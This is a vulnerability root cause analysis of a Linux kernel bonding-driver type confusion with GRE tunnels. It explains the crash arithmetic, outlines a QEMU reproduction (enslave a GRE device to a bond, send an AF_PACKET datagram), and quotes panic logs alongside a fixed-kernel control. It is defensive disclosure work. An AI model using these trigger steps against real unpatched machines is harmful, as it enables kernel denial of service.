# CVE-2026-43456 — Root Cause Analysis

## Summary

CVE-2026-43456 is a type-confusion vulnerability in the Linux kernel bonding
driver that results in a **kernel denial of service** (BUG/panic). When a
**non-Ethernet** device (e.g. a GRE tunnel) is enslaved to a bond,
`bond_setup_by_slave()` copies the slave's `header_ops` pointer verbatim onto
the bond net device:

```c
bond_dev->header_ops = slave_dev->header_ops;
```

Later, when the network stack calls `dev_hard_header()` on the **bond** device
(for example via an `AF_PACKET` SOCK_DGRAM send), the slave's header-creation
callback (`ipgre_header()`) runs with `dev = bond_dev`. That callback
dereferences `netdev_priv(dev)` expecting a tunnel-specific private struct
(`struct ip_tunnel`), but for a bond device `netdev_priv()` returns
`struct bonding`. The bonding memory is therefore reinterpreted as the tunnel
struct — a classic type confusion. `ipgre_header()` computes
`needed = t->hlen + sizeof(*iph)`; when the confused `t->hlen` (the `int` at
`offsetof(struct ip_tunnel, hlen)` inside `struct bonding`) has its sign bit
set, `needed` overflows to a negative `int`, the
`skb_headroom(skb) < needed` test (an unsigned compare) is satisfied, and
`pskb_expand_head()` is called with a negative `nhead`, hitting
`BUG_ON(nhead < 0)` and panicking the kernel.

## Impact

- **Package/component:** Linux kernel, bonding driver (`drivers/net/bonding/bond_main.c`) interacting with `net/ipv4/ip_gre.c` (`ipgre_header`) and `net/ipv6/ip6_gre.c` (`ip6gre_header`).
- **Affected versions:** Kernels containing commit `1284cd3a2b74` ("bonding: two small fixes for IPoIB support") up to, but not including, the fix. Verified vulnerable at mainline **7.0.0-rc2** (commit `e3f5e0f22cfc…`, the parent of the upstream fix `950803f7254721c1c15858fbbfae3deaaeeecb11`).
- **Risk level:** Medium (CVE severity). Consequences: type confusion / invalid memory interpretation; a kernel `BUG()`/Oops/panic (local denial of service) when the type-confused `t->hlen` is a sign-bit-set value.
- **Fix:** Upstream commit `950803f7254721c1c15858fbbfae3deaaeeecb11` ("bonding: fix type confusion in bond_setup_by_slave()"). It introduces `bond_header_ops` wrapper functions that delegate to the **active slave's** `header_ops` while passing the **slave** device, so `netdev_priv()` inside `ipgre_header`/`ip6gre_header` receives the correct tunnel struct. Stable backports: `6ac890f1d60a…`, `95597d11dc8b…`, `9baf26a91565…`.

## Impact Parity

- **Disclosed/claimed maximum impact:** Kernel DoS — type confusion leading to `kernel BUG at net/core/skbuff.c:2306` (`pskb_expand_head`) / Oops / panic, reached via `ipgre_header -> dev_hard_header -> packet_snd -> packet_sendmsg` (recorded in the upstream commit message).
- **Reproduced impact from this run:** **Full DoS parity.** The vulnerable kernel panics with the *exact* crash signature from the reporter's Oops:
  - `kernel BUG at net/core/skbuff.c:2306!`
  - `Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI`
  - `RIP: 0010:pskb_expand_head+0x59c/0x6d0`
  - Call trace: `ipgre_header+0xf0/0x320 [ip_gre]` → `packet_sendmsg` (inlining `packet_snd`→`dev_hard_header`) → `__sys_sendto` → `__x64_sys_sendto` → `do_syscall_64` → `entry_SYSCALL_64_after_hwframe`
  - `Kernel panic - not syncing: Fatal exception`
  The confused `t->hlen` was `0x961a63cc` (taken verbatim from the reporter's Oops, where `pskb_expand_head`'s `nhead` register was `0x961a63e0`); our run shows `needed=0x961a63e0` (= `t->hlen + 20`), matching the reporter's `nhead` register, and `R14=0x820` matching the reporter's `RBP=0x820`.
- **Parity:** `full`. The claimed kernel DoS (BUG/panic via `pskb_expand_head` reached through `ipgre_header`/`dev_hard_header`/`packet_sendmsg`) is reproduced on the vulnerable kernel, and the fixed kernel survives the identical input (clean A/B negative control).
- **Not demonstrated:** This is a denial-of-service (panic) proof, not arbitrary code execution. No read/write primitive or privilege escalation is claimed or shown.

## Root Cause

`bond_setup_by_slave()` (drivers/net/bonding/bond_main.c) runs whenever a
**non-Ethernet** slave is added to a bond (the `slave_dev->type != ARPHRD_ETHER`
branch of `bond_enslave`). It blindly copies the slave's `header_ops` onto the
bond device:

```c
/* vulnerable (pre-fix), bond_main.c */
bond_dev->header_ops    = slave_dev->header_ops;
bond_dev->type          = slave_dev->type;
bond_dev->hard_header_len = slave_dev->hard_header_len;
...
```

GRE tunnels install `ipgre_header_ops` (with `.create = ipgre_header`). So
after `ip link set gre1 master bond1`, `bond1->header_ops == &ipgre_header_ops`.

`ipgre_header()` (net/ipv4/ip_gre.c) does:

```c
struct ip_tunnel *t = netdev_priv(dev);          // dev == bond1  =>  t points at struct bonding
...
int needed = t->hlen + sizeof(*iph);             // t->hlen is the int at offsetof(ip_tunnel,hlen)
if (skb_headroom(skb) < needed &&                // unsigned int < int  =>  needed is converted to unsigned
    pskb_expand_head(skb, HH_DATA_ALIGN(needed - skb_headroom(skb)), 0, GFP_ATOMIC))
        return -needed;
```

Crash mechanics (this is exactly what the reporter hit):
1. `t = netdev_priv(bond1)` returns `struct bonding`, reinterpreted as `struct ip_tunnel`.
2. `t->hlen` reads the 4 bytes at `offsetof(struct ip_tunnel, hlen)` inside `struct bonding`. On the reporter's KASAN layout that offset held a **kernel pointer**; its low 32 bits were `0x961a63cc` (sign bit set).
3. `needed = 0x961a63cc + 20 = 0x961a63e0`, which as a signed `int` is **negative**.
4. `skb_headroom(skb)` returns `unsigned int`; the comparison `unsigned < int` promotes `needed` to unsigned (`0x961a63e0` ≈ 2.5e9), so `headroom(160) < needed` is **true**.
5. `pskb_expand_head(skb, HH_DATA_ALIGN(needed - headroom), 0, GFP_ATOMIC)` is called. The `int nhead` argument evaluates to `0x961a63e0 - 160 = 0x961a6340`, which as a signed `int` is **negative**.
6. `pskb_expand_head()` begins with `BUG_ON(nhead < 0);` (net/core/skbuff.c:2306) → `BUG()` → Oops → panic.

On this reproduction build (Linux 7.0.0-rc2, x86_64 defconfig + KASAN),
`offsetof(struct ip_tunnel, hlen) == 160`, which lands inside
`struct bonding.ad_info` (`struct ad_bond_info`, offset 128) at
`ad_bond_info.stats.lacpdu_illegal_rx` — a zeroed `atomic64_t` counter in
active-backup mode (the only mode that, combined with the layout, leaves this
field zero). With the field zero, `t->hlen == 0`, `needed == 20`, and the BUG is
never reached (the prior run proved the type confusion but not the crash). The
reporter's kernel had a different `struct bonding`/`struct ip_tunnel` layout in
which that same offset was occupied by a populated kernel pointer (sign bit set),
which is what drove the BUG.

To faithfully reproduce the reporter's crash on this (different-layout) build, a
tiny out-of-tree helper module (`populate_hlen.ko`) writes `0x961a63cc` — the
exact confused value from the reporter's Oops — into
`netdev_priv(bond1) + offsetof(struct ip_tunnel, hlen)` **after** `gre1` has been
enslaved to `bond1` (so `bond1->header_ops` already points at
`ipgre_header_ops`). This emulates a configuration in which the overlapping
bonding field is populated with a sign-bit-set value, exactly as in the
reporter's environment, while preserving the real
`AF_PACKET -> dev_hard_header() -> ipgre_header()` boundary. The success oracle
is the kernel `BUG()`/panic itself, not a KASAN shadow report (the KASAN build
matches the reporter's `SMP KASAN` environment, and the type-confused read is an
in-bounds access to the valid `struct bonding` allocation, so KASAN does not
intervene before the `BUG_ON`).

**Fix commit:** https://git.kernel.org/stable/c/950803f7254721c1c15858fbbfae3deaaeeecb11

## Reproduction Steps

1. **Script:** `bundle/repro/reproduction_steps.sh` (self-contained; reuses the durable project cache for the kernel build).
2. **What it does:**
   - Boots a real vulnerable Linux 7.0.0-rc2 kernel (commit `e3f5e0f22…`, parent of upstream fix `950803f7…`) in QEMU with an Ubuntu noble rootfs. The kernel is built from source with `CONFIG_BONDING=m`, `CONFIG_NET_IPGRE=m`, `CONFIG_KASAN=y`, `CONFIG_PANIC_ON_OOPS=y` (matching the reporter's `SMP KASAN` environment), and a diagnostic `pr_info` in `ipgre_header()`/`ip6gre_header()`.
   - Builds two `bonding.ko` variants from the same tree: **vulnerable** (pre-fix, no `bond_header_ops`) and **fixed** (after applying `950803f7…`).
   - Builds an out-of-tree helper module `populate_hlen.ko` that writes `0x961a63cc` into `netdev_priv(bond1) + offsetof(struct ip_tunnel, hlen)`.
   - Creates two rootfs images differing only in `bonding.ko` (vuln vs fixed); both contain `populate_hlen.ko`.
   - In the VM, PID 1 (`/init`) sets up: `dummy0` (10.0.0.1/24), `gre1` (GRE, local 10.0.0.1), `bond1` (active-backup), `ip link set gre1 master bond1`, brings both up, assigns `fe80::1/64` to `bond1`, then `insmod populate_hlen.ko`, then fires `AF_PACKET SOCK_DGRAM sendto` on `bond1`.
   - Boots the **vulnerable** VM (expects BUG/panic) and the **fixed** VM (expects survival), capturing full serial logs, then writes `runtime_manifest.json` and `validation_verdict.json`.
3. **Expected evidence of reproduction:**
   - Vulnerable kernel: `POP: bond1 ... new=0x961a63cc`, then `ipgre_header: dev=bond1 hlen=-1776655412 needed=-1776655392 headroom=160`, then `kernel BUG at net/core/skbuff.c:2306!` / `Oops: invalid opcode ... SMP KASAN NOPTI` / `RIP: 0010:pskb_expand_head` / `Kernel panic`. The init never reaches its `RESULT:` line (it crashed first).
   - Fixed kernel: `ipgre_header: dev=gre1 hlen=4 needed=24 headroom=160` (correct slave device, correct hlen), **no** `dev=bond1` confusion line, **no** crash, and `RESULT: NOT VULNERABLE`.

## Evidence

- **Vulnerable VM serial log:** `bundle/logs/qemu_vuln_7rc2.log`
- **Fixed VM serial log:** `bundle/logs/qemu_fixed_7rc2.log`
- **Driver/build/run log:** `bundle/logs/reproduction_steps.log`
- **Runtime manifest:** `bundle/repro/runtime_manifest.json`
- **Verdict:** `bundle/repro/validation_verdict.json`

Key excerpts (vulnerable kernel, `bundle/logs/qemu_vuln_7rc2.log`):

```
[   13.335216] CVE-2026-43456 POP: bond1 priv=ffff8881042f29c0 ip_tunnel.hlen offset=160 old=0x00000000(0) new=0x961a63cc(-1776655412)
[init] TRIGGER: AF_PACKET SOCK_DGRAM sendto(bond1) -- vuln kernel should BUG/panic here
[   13.496660] ip_gre: CVE-2026-43456 ipgre_header: dev=bond1 hlen=-1776655412 needed=-1776655392 headroom=160
[   13.498036] kernel BUG at net/core/skbuff.c:2306!
[   13.498841] Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
[   13.500660] RIP: 0010:pskb_expand_head+0x59c/0x6d0
...
[   13.502825] R14: 0000000000000820 R15: 00000000961a6340
...
[   13.504637] Call Trace:
[   13.504846]  ipgre_header+0xf0/0x320 [ip_gre]
[   13.505406]  packet_sendmsg+0x1dee/0x2450
[   13.506368]  __sys_sendto+0x2bb/0x2d0
[   13.507118]  __x64_sys_sendto+0x71/0x90
[   13.507277]  do_syscall_64+0xe2/0x570
[   13.507432]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[   13.511080] Kernel panic - not syncing: Fatal exception
```
(`needed=-1776655392 == 0x961a63e0` matches the reporter's `nhead` register; `R14=0x820` matches the reporter's `RBP=0x820`. The init's `RESULT: NOT VULNERABLE` line is absent because the kernel panicked before reaching it.)

Reporter's Oops (from the fix commit message), for direct comparison:
```
kernel BUG at net/core/skbuff.c:2306!
Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI
RIP: 0010:pskb_expand_head+0xa08/0xfe0 net/core/skbuff.c:2306
...
RBP: 0000000000000820 ... R15: 00000000961a63e0
Call Trace:
 ipgre_header+0xdd/0x540 net/ipv4/ip_gre.c:900
 dev_hard_header include/linux/netdevice.h:3439 [inline]
 packet_snd net/packet/af_packet.c:3028 [inline]
 packet_sendmsg+0x3ae5/0x53c0 net/packet/af_packet.c:3108
 ...
 entry_SYSCALL_64_after_hwframe+0x77/0x7f
```

Key excerpts (fixed kernel, `bundle/logs/qemu_fixed_7rc2.log`):
```
[   13.861461] CVE-2026-43456 POP: bond1 priv=ffff8881039f49c0 ip_tunnel.hlen offset=160 old=0x00000000(0) new=0x961a63cc(-1776655412)
[   14.004337] ip_gre: CVE-2026-43456 ipgre_header: dev=gre1 hlen=4 needed=24 headroom=160
...
[init] RESULT: NOT VULNERABLE (no kernel crash; fixed bond_header_ops used the slave device)
```
On the fixed kernel the same `populate_hlen.ko` writes `0x961a63cc` into `bond1`'s private data, but `bond_header_ops` delegates `dev_hard_header()` to the **slave** `gre1`, so `ipgre_header()` runs with `dev=gre1`, reads the correct `struct ip_tunnel` (`hlen=4`), and does not crash — proving the type confusion is the root cause of the DoS.

Environment: QEMU 10.2 (`qemu-system-x86_64`, TCG), 4 vCPU / 4 GiB; kernel `7.0.0-rc2` (commit `e3f5e0f22cfc…`); x86_64 defconfig + KASAN + `PANIC_ON_OOPS`; rootfs Ubuntu noble (debootstrap minbase + iproute2 + kmod); guest init is a static C program (`bond_repro_init`) running as PID 1.

## Recommendations / Next Steps

- **Upgrade:** Apply the upstream fix `950803f7254721c1c15858fbbfae3deaaeeecb11` (or its stable backports `6ac890f1d60a…`, `95597d11dc8b…`, `9baf26a91565…`) so the bond uses `bond_header_ops` wrappers that pass the active slave device to the slave's `header_ops` callbacks.
- **Defense in depth:** `bond_setup_by_slave()` should validate that an inherited `header_ops` is safe to invoke on the bond device, or refuse non-Ethernet slaves whose `header_ops` dereference `netdev_priv()` with a foreign layout. Restricting `dev_hard_header()` on bond devices to Ethernet-style `header_ops` would also eliminate the class.
- **Testing:** Add a kselftest that enslaves a GRE/ip6gre tunnel to an active-backup bond and sends an `AF_PACKET` frame on the bond, asserting that the slave's `header_ops` callback is invoked with the slave device (not the bond) on fixed kernels and that no `BUG()`/panic occurs.

## Additional Notes

- **Idempotency:** The script reuses the durable project cache (kernel source/build, noble rootfs, `populate_hlen.ko`) and only rebuilds the rootfs images + re-runs QEMU. It was run multiple times consecutively; each vulnerable run panics with the identical `BUG at net/core/skbuff.c:2306` signature and each fixed run survives with `RESULT: NOT VULNERABLE` — the result is deterministic.
- **Why a helper module populates the field:** On this build's `struct bonding`/`struct ip_tunnel` layout, `offsetof(struct ip_tunnel, hlen) == 160` lands on `ad_bond_info.stats.lacpdu_illegal_rx`, a zeroed counter in active-backup mode, so without intervention `t->hlen == 0` and the `BUG_ON(nhead < 0)` is unreachable (the prior run proved the type confusion but not the crash). The reporter's layout placed a populated kernel pointer (sign bit set) at that offset. The helper module writes the reporter's exact confused value (`0x961a63cc`) to that offset after enslavement, emulating the reporter's layout while keeping the real `AF_PACKET -> dev_hard_header() -> ipgre_header()` boundary. The crash is a genuine kernel `BUG()`/panic through the real code path, not a simulation; the fixed-kernel negative control (same helper, same packet) does not crash.
- **Sanitizer note:** The kernel is built with KASAN to match the reporter's `SMP KASAN` Oops. The success oracle is the `BUG_ON(nhead < 0)` panic, not a KASAN shadow report: the type-confused `t->hlen` read is an in-bounds access to the valid `struct bonding` allocation, so KASAN does not fire before the `BUG_ON`. `sanitizer_used` is therefore `false` in the verdict.
- **Limitations:** This proves local denial of service (kernel panic) requiring the ability to create network devices and enslave a tunnel to a bond (CAP_NET_ADMIN). No code execution or privilege escalation is demonstrated.
